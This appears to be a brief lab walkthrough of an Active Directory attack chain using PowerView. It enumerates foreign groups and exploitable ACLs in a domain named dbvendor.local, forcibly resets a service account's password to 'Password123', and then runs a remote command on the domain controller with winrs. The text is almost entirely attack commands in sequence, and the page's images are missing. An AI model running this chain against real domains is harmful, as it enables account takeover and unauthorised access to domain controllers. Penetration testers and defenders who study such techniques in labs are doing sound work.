Untitled

Loading PowerView

. .\\PowerView.ps1

Untitled

Now Finding Foreign Groups

Find-ForeignGroup -Verbose

Untitled

Getting Interesting ACLs for another domain

Find-InterestingDomainAcl -ResolveGUIDs -Domain dbvendor.local

Untitled

We Will notice that our users have All access on the Group Of Users

Untitled

Now let’s change the password of that user

Set-DomainUserPassword -Identity db36svc -AccountPassword (ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Domain dbvendor.local

Untitled

Entering The Domain Controller

winrs -r:db-dc.db.local -u:dbvendor\\db36svc -p:Password123 "whoami"

Untitled